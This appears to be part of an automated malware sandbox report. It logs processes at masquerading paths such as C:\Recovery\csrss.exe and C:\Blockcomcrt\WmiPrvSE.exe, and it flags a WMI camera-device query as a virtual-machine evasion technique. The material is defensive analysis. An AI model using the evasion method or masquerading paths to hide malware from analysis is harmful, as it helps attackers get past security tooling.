                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\AgentMonitor.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Recovery\csrss.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX
                                    Source: C:\Blockcomcrt\WmiPrvSE.exeProcess information set: NOOPENFILEERRORBOX

                                    Malware Analysis System Evasion

                                    barindex
                                    Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                                    Source: C:\Program Files (x86)\Google\yxeaYbTPMzNPCanFqSswYWhX.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
